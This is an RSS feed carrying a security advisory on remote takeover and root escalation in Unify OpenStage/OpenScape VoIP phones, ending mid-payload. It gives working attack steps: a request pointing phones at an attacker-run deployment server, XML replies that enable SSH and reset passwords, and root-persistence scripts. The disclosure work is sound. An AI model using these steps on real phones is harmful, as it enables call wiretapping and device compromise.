<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="../../assets/xml/rss.xsl" media="all"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Pentagrid AG (Posts about Exploit)</title><link>https://www.pentagrid.ch/</link><description></description><atom:link href="https://www.pentagrid.ch/en/categories/exploit.xml" rel="self" type="application/rss+xml"></atom:link><language>en</language><copyright>Contents © 2026 Pentagrid AG </copyright><lastBuildDate>Wed, 17 Jun 2026 19:14:54 GMT</lastBuildDate><generator>Nikola (getnikola.com)</generator><docs>http://blogs.law.harvard.edu/tech/rss</docs><item><title>Remote code execution and elevation of local privileges in Mitel Unify OpenStage and OpenScape VoIP phones</title><link>https://www.pentagrid.ch/en/blog/rce-and-local-root-in-openstage-and-openscape-phones/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;figure&gt;&lt;img src="https://www.pentagrid.ch/images/202312_unify_framebuffer.jpg"&gt;&lt;/figure&gt; &lt;p&gt;During a research project, Pentagrid identified multiple vulnerabilities in the OpenStage and OpenScape VoIP phone series. The combination of insecure defaults and implementation weaknesses allows a remote compromise and the elevation of privileges for a network-local attacker on phones with an unhardened default configuration. Compromising a phone does not only allow to wiretap phone calls, but could also be abused to access microphones for listening to rooms. The vulnerabilities affect a wide range of devices. Pentagrid assumes that many small companies don't use a hardened configuration and are likely affected.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;OpenStage and OpenScape are a phone series brand originally developed by Siemens. In 2013, Siemens' devision for enterprise communication was rebranded to Unify. Unify was sold to Atos in 2016, a company that is the &lt;a class="reference external" href="https://unify.com/en/2023/news_2023_01_24/atos-enters-into-exclusive-negotiations-with-mitel"&gt;"European number one in cybersecurity"&lt;/a&gt;. During the coordinated disclosure, Atos sold Unify to Mitel.&lt;/p&gt;
&lt;p&gt;OpenStage and OpenScape phones provide an interface, which is named &lt;a class="reference external" href="https://wiki.unify.com/wiki/OpenStage_WPI"&gt;Work Point Interface (WPI)&lt;/a&gt;. This is a web-based service on the phones, where a client and the WPI exchange XML messages via HTTPS for machine to machine communication. This WPI is accessible via TCP port 8085 on the phone side. If a customer operates a large set of phones, then the the customer likely uses a deployment tool. This is called Deployment Service (DLS) or Deployment Service Light (DLI). Additionally, the phones have a web-based management (WBM) interface on port 80 and 443.&lt;/p&gt;
&lt;p&gt;In the default configuration, the Workpoint Interface does not use authentication and the phones do not verify the DLS/DLI. Any deployment tool can connect the phone to send a configuration. The DLS protocol is public and can be found via document sharing platforms under the title "OpenStage / OpenScape Desk Phone IP Provisioning Interface" with the document ID A31003-S2000-R102-16-7620, which was published 2016. This workpoint interface is used here for the initial access. Furthermore, Pentagrid identified local vulnerabilities, which an attacker can use for privilege escalation.&lt;/p&gt;
&lt;p&gt;OpenStage and OpenScape phones are Linux-based systems and quite popular in Germany. They are used in banks and public authorities. Getting initial access on OpenStage HFA phones was mentioned &lt;a class="reference external" href="https://wikileaks.org/ciav7p1/cms/page_524426.html"&gt;in the Vault 7 leak in 2013&lt;/a&gt;.&lt;/p&gt;
&lt;section id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;2023-08-20: Initial contact of Atos Unify via &lt;a class="reference external" href="mailto:obso@atos.net"&gt;obso@atos.net&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-08-24: Pentagrid provided the preliminary advisory and further details.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-08-25: Atos replied that they will work on resolving the issues and inform about the progress.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-10-19: Phone call with product security officer about the current status and Atos' adivsory.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-10-19: Atos provided a version 0.3 of the advisory to Pentagrid.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-10-25: Call with Unify leader of the product managment and product security officer.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-11-20: Planned release date according to 90 days period.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-11-27: Agreed prolongation of the release date.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-12-08: Deferred release date to be in line with the Unify publication.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-12-08: Pentagrid published this advisory.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-12-08: Unify communicated a delay of the Unify advisory. It is expected for the 2023-12-13.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2023-12-11: Unify publishes &lt;a class="reference external" href="https://networks.unify.com/security/advisories/OBSO-2312-01.pdf"&gt;OBSO-2312-01&lt;/a&gt;. Updated references to the advisory.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="unauthenticated-wpi-allows-enabling-secure-shell-and-resetting-admin-password"&gt;
&lt;h2&gt;1.  Unauthenticated WPI allows enabling Secure Shell and resetting admin password&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, 8.8 High&lt;/pre&gt;
&lt;section id="affected-components"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;Pentagrid identified the following devices and firmware versions to be affected. Please refer to the Unify advisory OBSO-2312-01 for a detailled list of affected devices and firmware versions.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 40  Version 3.5.21.0000 (Released: 2020-09-21)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 80  Version 3.3.24.0000 (Released: 2014-10-10)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.10.2.0002 (Released: 2023-04-04)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.9.5.0002&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.11.0000 (Released: 2023-06-26)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.9.0001&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.6.0000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.11.0000&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="summary"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;By default, the Work Point Interface on the phone does not verify the deployment service and there is no authentication mechanism. Hence, any client implementing a deployment service can connect a phone and change configuration. A remote attacker can enable the Secure Shell feature on the phone by abusing the unauthenticated Workpoint Interface. It is possible to set an attacker-defined password for the admin user, even if there was a password defined. The attacker only has to be in the same network. The WPI is active by default.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;The attacker is able to set the admin user’s password to a defined valued, enable SSH and is able to connect to the phone as user admin.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;Each phone has a Work Point Interface enabled. It is a remote management interface and this interface is accessible via the phone’s TCP port 8085. The port uses TLS for encryption. A maintenance tool can connect to a phone’s WPI interface and vice versa a phone can connect a DLS server.
An attacker can prompt the phone to contact a malicious DLS server. Therefore, an attacker sends a HTTP GET request to the phone’s web interface using this URL format:&lt;/p&gt;
&lt;pre class="literal-block"&gt;https://TARGETPHONEIP:443/contact_dls.html/ContactDLS?ContactMe=true&amp;amp;dls_ip_addr=MALICIOUSSERVER&amp;amp;dls_ip_port=MALICIOUSPORT&lt;/pre&gt;
&lt;p&gt;The web interface on port 80 and 443 is enabled by default. It is also possible to send a plain HTTP GET request to the DLS interface on Port 8085:&lt;/p&gt;
&lt;pre class="literal-block"&gt;http://TARGETPHONEIP:8085/contact_dls.html/ContactDLS?ContactMe=true&amp;amp;dls_ip_addr=MALICIOUSSERVER&amp;amp;dls_ip_port=MALICIOUSPORT&lt;/pre&gt;
&lt;p&gt;The phone then connects to the given DLS server with some configuration information and a nonce value as shown in the following snippet:&lt;/p&gt;
&lt;pre class="literal-block"&gt;POST /DeploymentService/LoginService HTTP/1.1
Host: XXXXXXXX:XXXX
Cookie: PHPSESSID=g75hrag2ksves20dbar471b8v5; path=/
Content-Type: text/xml
Content-Length: 1957
Connection: close

&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;WorkpointMessage
     xmlns="http://www.siemens.com/DLS"
     xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
     xsi:schemaLocation="http://www.siemens.com/DLS"&amp;gt;
     &amp;lt;Message nonce="D5AFD7A47752175FF354867D94A61AE0" maxItems="-1"&amp;gt;
             &amp;lt;ReasonForContact&amp;gt;solicited&amp;lt;/ReasonForContact&amp;gt;
             &amp;lt;ItemList&amp;gt;
                     &amp;lt;Item name="device-type"&amp;gt;OpenScape Desk Phone CP210&amp;lt;/Item&amp;gt;
                     &amp;lt;Item name="related-device-type"&amp;gt;OpenScape Desk Phone CP210&amp;lt;/Item&amp;gt;
                     &amp;lt;Item name="gigabit-ethernet-enabled"&amp;gt;true&amp;lt;/Item&amp;gt;
                     […]&lt;/pre&gt;
&lt;p&gt;The malicious DLS server replies with an XML message that prompts the phone to enable SSH. The nonce value sent by the phone must be included in this XML message. Furthermore, the admin user’s password is forced to an attacker-known value, which is possible within the same message. An example for such a message is given below:&lt;/p&gt;
&lt;pre class="literal-block"&gt;HTTP/1.0 200 OK
Content-length: 323

&amp;lt;DLSMessage&amp;gt;
     &amp;lt;Message nonce="7AA535AE3483E8380B9338C733D6A934"&amp;gt;
             &amp;lt;Action&amp;gt;WriteItems&amp;lt;/Action&amp;gt;
     &amp;lt;/Message&amp;gt;
     &amp;lt;ItemList&amp;gt;
             &amp;lt;Item name="ssh-enable"&amp;gt;true&amp;lt;/Item&amp;gt;
             &amp;lt;Item name="ssh-password"&amp;gt;123456&amp;lt;/Item&amp;gt;
             &amp;lt;Item name="ssh-timer-connect"&amp;gt;10&amp;lt;/Item&amp;gt;
             &amp;lt;Item name="ssh-timer-session"&amp;gt;60&amp;lt;/Item&amp;gt;
     &amp;lt;/ItemList&amp;gt;
&amp;lt;/DLSMessage&amp;gt;&lt;/pre&gt;
&lt;p&gt;The figure below illustrates the message flow.&lt;/p&gt;
&lt;img alt="Message flow between Phone and DLS." class="align-center" src="https://www.pentagrid.ch/images/202312_unify_message_flow.png"&gt;
&lt;p&gt;The attacker can now connect to the phone via a secure shell as an admin user with the password 123456. No authentication was needed to get here.&lt;/p&gt;
&lt;pre class="literal-block"&gt;ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oMACs=+hmac-sha1 admin@PHONEIP&lt;/pre&gt;
&lt;p&gt;In the OpenStage 80 version 2.2.47.0000 it was not possible to enable SSH directly. But using the malicious DLS server an attacker can change the admin password for the web interface of the phone if it was changed from the default password 123456. The process is similar to enabling SSH as seen above, but the content of the item list in the response of the DLS server needs to be changed to the following line.&lt;/p&gt;
&lt;pre class="literal-block"&gt;&amp;lt;Item name="admin-pwd"&amp;gt;123456&amp;lt;/Item&amp;gt;&lt;/pre&gt;
&lt;p&gt;Alternatively, an attacker could factory reset the phone via DLS to reset the admin password to 123456 automatically. Therefore, the attacker sends this message as response of the DLS server:&lt;/p&gt;
&lt;pre class="literal-block"&gt;HTTP/1.0 200 OK
Content-length: 244

&amp;lt;DLSMessage&amp;gt;
     &amp;lt;Message nonce="7AA535AE3483E8380B9338C733D6A934"&amp;gt;
             &amp;lt;Action&amp;gt;Restart&amp;lt;/Action&amp;gt;
     &amp;lt;/Message&amp;gt;
     &amp;lt;ItemList&amp;gt;
             &amp;lt;Item name="restart-password"&amp;gt;124816&amp;lt;/Item&amp;gt;
             &amp;lt;Item name="restart-type"&amp;gt;FactoryReset&amp;lt;/Item&amp;gt;
     &amp;lt;/ItemList&amp;gt;
 &amp;lt;/DLSMessage&amp;gt;&lt;/pre&gt;
&lt;p&gt;Within this message, a factory reset password must be included in the message. It is a &lt;a class="reference external" href="https://wiki.unify.com/wiki/OpenScape_Desk_Phone_CP_FAQ"&gt;documented and publicly known&lt;/a&gt;  value. A factory reset will reboot the phone.&lt;/p&gt;
&lt;p&gt;Having admin access to the web interface, an attacker can now enable SSH as well. If the web interface was disabled, it can be reenabled via a malicious DLS message using the following item.&lt;/p&gt;
&lt;pre class="literal-block"&gt;&amp;lt;Item name="enable-WBM"&amp;gt;True&amp;lt;/Item&amp;gt;&lt;/pre&gt;
&lt;/section&gt;
&lt;section id="precondition"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs access to the local network and must be able to connect the WPI interface. The phone does not verify the DLS server.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="phone-does-not-verify-tls-certificate-of-dls-server-per-default"&gt;
&lt;h2&gt;2.  Phone does not verify TLS certificate of DLS server per default&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, 4.3 Medium&lt;/pre&gt;
&lt;section id="affected-components-1"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;Pentagrid identified the following devices and firmware versions to be affected. Please refer to the Unify advisory OBSO-2312-01 for a detailled list of affected devices and firmware versions.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 40  Version 3.5.21.0000 (Released: 2020-09-21)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 80  Version 3.3.24.0000 (Released: 2014-10-10)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.10.2.0002 (Released: 2023-04-04)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.11.0000 (Released: 2023-06-26)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.6.0000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.11.0000&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="summary-1"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;The phone does not verify the TLS certificate when connecting to the DLS server, with standard settings.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact-1"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;This allows man-in-the-middle attackers to spoof a DLS connection. An attackers could also host their own DLS server with an arbitrary certificate. The phone connects to a malicous DLS server and accepts configuration.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details-1"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;During the analysis it has been observed that the phone connects to DLS server, even if the server does not use a certificate that is signed by a trusted certificate authority. Instead, self-signed certificates are accepted. The phone’s debug log in &lt;code class="docutils literal"&gt;/tmp/logs/messages&lt;/code&gt; even logs that it is accepting the certificate.&lt;/p&gt;
&lt;pre class="literal-block"&gt;SvcConfig: Certificate verification error (9:certificate is not yet valid) at depth (0), ssl (0x9c2028)
Sep 29 11:27:34 (none) user.err SvcConfig: Certificate issuer  =C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
[…]
Sep 29 11:27:34 (none) user.debug SvcConfig: isVerificationSuccessful: caPath =
Sep 29 11:27:34 (none) user.notice SvcConfig: Allowed HTTPS Not Yet Valid Certificate: /C=AU/ST=Some-State/O=Internet Widgits Pty Ltd
Sep 29 11:27:34 (none) user.debug SvcConfig: SecureTransportContext::deleteVerifyError for 0x9c2028&lt;/pre&gt;
&lt;p&gt;The log indicates that certificates is not valid, but allowed.&lt;/p&gt;
&lt;p&gt;The phone's web interface defines authentication policies under Security and policies -&amp;gt; Certificates -&amp;gt; Authentication policy, but changing them does not solve the problem described in finding 1 and 2.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition-1"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs to prompt the phone to contact a server without a valid certificate. Therefore, the attacker needs to be in the same network as the VoIP phone.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="secure-shell-privilege-escalation-to-root-via-writeable-files-and-directories"&gt;
&lt;h2&gt;3.  Secure Shell privilege escalation to root via writeable files and directories&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H, 6.7 Medium&lt;/pre&gt;
&lt;section id="affected-components-2"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;Pentagrid identified the following devices and firmware versions to be affected. Please refer to the Unify advisory OBSO-2312-01 for a detailled list of affected devices and firmware versions.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 40  Version 3.5.21.0000 (Released: 2020-09-21)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenStage 80  Version 3.3.24.0000 (Released: 2014-10-10)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.6.0000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.11.0000&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="summary-2"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;A remote attacker with Secure Shell access as &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user is able to abuse improper file permissions to change system-relevant files.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact-2"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;An attacker can escalate privileges in order to gain permanent &lt;code class="docutils literal"&gt;root&lt;/code&gt; access on the phone.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details-2"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;For example, the &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user has write access to the &lt;code class="docutils literal"&gt;/etc/inetd.conf&lt;/code&gt; file and can add a script that gets executed with &lt;code class="docutils literal"&gt;root&lt;/code&gt; privileges when the phone starts. In this example, the script &lt;code class="docutils literal"&gt;test&lt;/code&gt; was added to the system and written to &lt;code class="docutils literal"&gt;/usr/local/bin/&lt;/code&gt;.&lt;/p&gt;
&lt;pre class="literal-block"&gt;telnet       stream  tcp     nowait  root    /usr/sbin/telnetd       telnetd
ftp          stream  tcp     nowait  root    /usr/sbin/ftpd          ftpd
test         stream  tcp     nowait  root    /usr/local/bin/test     test&lt;/pre&gt;
&lt;p&gt;The admin user then creates the following executable &lt;code class="docutils literal"&gt;/usr/local/bin/test&lt;/code&gt; script. The script changes the &lt;code class="docutils literal"&gt;root&lt;/code&gt; user's password and starts the dropbear service without parameters.&lt;/p&gt;
&lt;pre class="literal-block"&gt;#!/bin/sh
/Opera_Deploy/setPasswd.sh root 123456
/usr/sbin/dropbear&lt;/pre&gt;
&lt;p&gt;In order to reload the inetd config and execute the test script on connect, the phone needs to reboot. The attacker can use a malicious DLS server as described in finding 1 to send the following response.&lt;/p&gt;
&lt;pre class="literal-block"&gt;HTTP/1.0 200 OK
Content-length: 121

&amp;lt;DLSMessage&amp;gt;
     &amp;lt;Message nonce="7AA535AE3483E8380B9338C733D6A934"&amp;gt;
             &amp;lt;Action&amp;gt;Restart&amp;lt;/Action&amp;gt;
     &amp;lt;/Message&amp;gt;
&amp;lt;/DLSMessage&amp;gt;&lt;/pre&gt;
&lt;p&gt;After the reboot, the attacker can permanently connect to the phone via SSH as &lt;code class="docutils literal"&gt;root&lt;/code&gt;. The regular invocation of the Dropbear SSH server uses the &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;-w&lt;/span&gt;&lt;/code&gt; parameter, which prevents connections for the &lt;code class="docutils literal"&gt;root&lt;/code&gt; user, but here the SSH server is started without this restriction.&lt;/p&gt;
&lt;p&gt;The following files have improper file permission, which could be used for privilege escalation:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;code class="docutils literal"&gt;/usr/sbin/stunnel&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code class="docutils literal"&gt;/etc/inetd.conf&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Depending on the phone's firmware version, there are more files and directories with problematic file permissions. Further above, the directory &lt;code class="docutils literal"&gt;/usr/local/bin/&lt;/code&gt; was mentioned to be writeable by the default shell user &lt;code class="docutils literal"&gt;admin&lt;/code&gt;. Files in this directory belong the &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user:&lt;/p&gt;
&lt;pre class="literal-block"&gt;$ ls -l /usr/local/
drwxrwxr-x    2 admin    admin          296 Dec 25 02:54 bin
drwxrwxr-x    2 admin    admin          368 Dec 25 02:54 sbin&lt;/pre&gt;
&lt;p&gt;Depending on the firmware version and model, the directory &lt;code class="docutils literal"&gt;/usr/local/bin/&lt;/code&gt; is part of the &lt;code class="docutils literal"&gt;PATH&lt;/code&gt; environment variable and this directory has precedence over other directories, for example on an OpenStage 40 SIP:&lt;/p&gt;
&lt;pre class="literal-block"&gt;# id
uid=0(root) gid=0(root) groups=0(root),10(wheel)
# echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/sbin:/sbin:/Opera_Deploy&lt;/pre&gt;
&lt;p&gt;Another method for the elevation of privileges is to add a file &lt;code class="docutils literal"&gt;chpasswd&lt;/code&gt; there, which is then executed on password change. This password change can be triggered with the method from finding 1 and there is no need to reboot the phone.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition-2"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs SSH access to the phone.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="writeable-framebuffer"&gt;
&lt;h2&gt;4.  Writeable framebuffer&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L, 3.4 Low&lt;/pre&gt;
&lt;section id="affected-components-3"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;Pentagrid identified the following devices and firmware versions to be affected. Please refer to the Unify advisory OBSO-2312-01 for a detailled list of affected devices and firmware versions.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.10.2.0002 (Released: 2023-04-04)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.9.5.0002&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.11.0000 (Released: 2023-06-26)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.9.0001&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.6.0000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.11.0000&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="summary-3"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;An attacker with Secure Shell access as the Linux user &lt;code class="docutils literal"&gt;admin&lt;/code&gt; is able to write into the framebuffer device.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact-3"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;An attacker can change the display content of the phone. Being able to specify the framebuffer content allows crafting specific content for the attack in finding 5.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details-3"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;Using SSH, the admin user can write arbitrary data into the framebuffer, because the frambuffer device is writeable:&lt;/p&gt;
&lt;pre class="literal-block"&gt;$ ls -l /dev/fb0
crw-rw-rw-    1 root     root       29,   0 Dec 25 04:25 /dev/fb0
$ echo AAAAAAAAAAAAAAAAAAAA &amp;gt; /dev/fb0&lt;/pre&gt;
&lt;p&gt;An attacker could show false information on the display with a well-crafted and timed payload.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition-3"&gt;
&lt;h3&gt;Precondition&lt;/h3&gt;
&lt;p&gt;An attacker needs code execution permission on the phone, for example via SSH access.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="openscape-secure-shell-privilege-escalation-to-root-via-setuid-programs"&gt;
&lt;h2&gt;5. OpenScape – Secure Shell Privilege escalation to root via SetUID programs&lt;/h2&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H, 6.7 Medium&lt;/pre&gt;
&lt;section id="affected-components-4"&gt;
&lt;h3&gt;Affected Components&lt;/h3&gt;
&lt;p&gt;Pentagrid identified the following devices and firmware versions to be affected. Please refer to the Unify advisory OBSO-2312-01 for a detailled list of affected devices and firmware versions.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 400 Version 1.10.2.0002 (Released: 2023-04-04)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 210 Version 2.0.11.0000 (Released: 2023-06-26)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.6.0000&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Unify OpenScape 710 Version 2.0.11.0000&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="summary-4"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;An attacker with Secure Shell access as &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user is able to abuse SetUID permissions to change system-relevant files.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="impact-4"&gt;
&lt;h3&gt;Impact&lt;/h3&gt;
&lt;p&gt;An attacker can escalate privileges in order to gain permanent &lt;code class="docutils literal"&gt;root&lt;/code&gt; access on the phone.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details-4"&gt;
&lt;h3&gt;Technical Details&lt;/h3&gt;
&lt;p&gt;The following files have the SUID bit set:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;&lt;code class="docutils literal"&gt;/sbin/fw_printenv&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;code class="docutils literal"&gt;/Opera_Deploy/appWeb/web/fbshot.exe&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The files are owned by the &lt;code class="docutils literal"&gt;root&lt;/code&gt; user and therefore get executed with &lt;code class="docutils literal"&gt;root&lt;/code&gt; privileges even when run by the &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user.&lt;/p&gt;
&lt;p&gt;The &lt;code class="docutils literal"&gt;fbshot.exe&lt;/code&gt; creates a screenshot of the display. It takes the content of the framebuffer and creates a BMP file. The &lt;code class="docutils literal"&gt;/dev/fb&lt;/code&gt; framebuffer is used as default, but it is possible to specify another framebuffer device as a parameter. As seen in finding 4, the &lt;code class="docutils literal"&gt;admin&lt;/code&gt; user can write into &lt;code class="docutils literal"&gt;/dev/fb0&lt;/code&gt;. Using the SetUID program &lt;code class="docutils literal"&gt;fbshot.exe&lt;/code&gt;, it is possible to overwrite arbitrary files on the system, which has a Denial of Service effect.&lt;/p&gt;
&lt;p&gt;While the output files are BMP files in the first place. However, by carefully crafting a buffer, writing the buffer to the framebuffer and using the framebuffer screenshot tool, is is also possible to write files that are more or less valid script files. As long as the attacker-specified code is run, it does not matter if the script fails with a syntax error afterwards, for example due to unbalanced brackets on a line.&lt;/p&gt;
&lt;p&gt;Payloads depend on the frambeuffer size and are therefore device-specific. A possible payload for a CP210 is:&lt;/p&gt;
&lt;pre class="literal-block"&gt;/home/admin/myscript
